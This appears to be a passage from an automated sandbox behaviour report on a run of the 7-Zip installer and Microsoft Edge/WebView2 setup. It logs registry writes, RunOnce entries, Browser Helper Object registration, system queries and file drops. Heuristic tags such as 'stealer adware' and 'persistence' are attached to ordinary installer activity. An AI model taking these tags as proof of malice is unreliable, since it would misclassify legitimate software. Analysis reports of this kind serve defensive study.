Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\LocalServer32\ServerExecutable = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_helper.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO\\ie_to_edge_bho_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\PdfPreview\\PdfPreviewHandler.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\EBWebView\\x64\\EmbeddedBrowserWebView.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}\InProcServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\notification_click_helper.exe\"" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2405-x64.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\!BCILauncher = "\"C:\\Windows\\Temp\\MUBSTemp\\BCILauncher.EXE\" bgaupmi=5A4941436A5B41B98951FE8BC14A1C5C" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\msedge_resetsb_{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --reset-startup-boost-last-used" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Checks installed software on the system

discovery

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\dxil.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\fr-CA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Locales\lo.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Locales\sr-Cyrl-BA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\it.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\vccorlib140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240516131912069_3420.pma C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Trust Protection Lists\Sigma\Cryptomining C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Trust Protection Lists\Sigma\Staging C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\bg.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\edge_feedback\camera_mf_trace.wprp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\vk_swiftshader_icd.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\msedge_pwa_launcher.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\identity_proxy\win10\identity_helper.Sparse.Stable.msix C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Trust Protection Lists\Sigma\Advertising C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\cs.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\sr-Latn-RS.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\ta.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\onnxruntime.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\msedgeupdateres_en.dll C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\124.0.2478.97\Locales\cs.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\d3dcompiler_47.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Locales\it.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Locales\ca-Es-VALENCIA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Locales\kk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\BHO\ie_to_edge_bho_64.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\124.0.2478.97\Trust Protection Lists\Sigma\Content C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\copilot_provider_msix\copilot_provider_neutral.msix C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\wdag.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\resources.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Locales\as.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Locales\pl.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ms.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\sr-Cyrl-BA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\msedge.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\telclient.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Installer\setup.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Trust Protection Lists\Sigma\Entities C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\lv.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\ffmpeg.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\identity_proxy\win11\identity_helper.Sparse.Dev.msix C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\Locales\fr-CA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\EBWebView\x86\EmbeddedBrowserWebView.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\msedge_100_percent.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\el.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\libEGL.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\identity_helper.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\libGLESv2.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\WidevineCdm\manifest.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdateSetup.exe C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\msvcp140_codecvt_ids.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\124.0.2478.97\Locales\gu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\124.0.2478.97\Locales\vi.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\msedgewebview2.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\msedgeupdateres_en-GB.dll C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\vcruntime140_1.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.97\identity_proxy\canary.identity_helper.exe.manifest C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Locales\ug.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\he.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sa.txt C:\Users\Admin\Downloads\7z2405-x64.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\msvcp140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
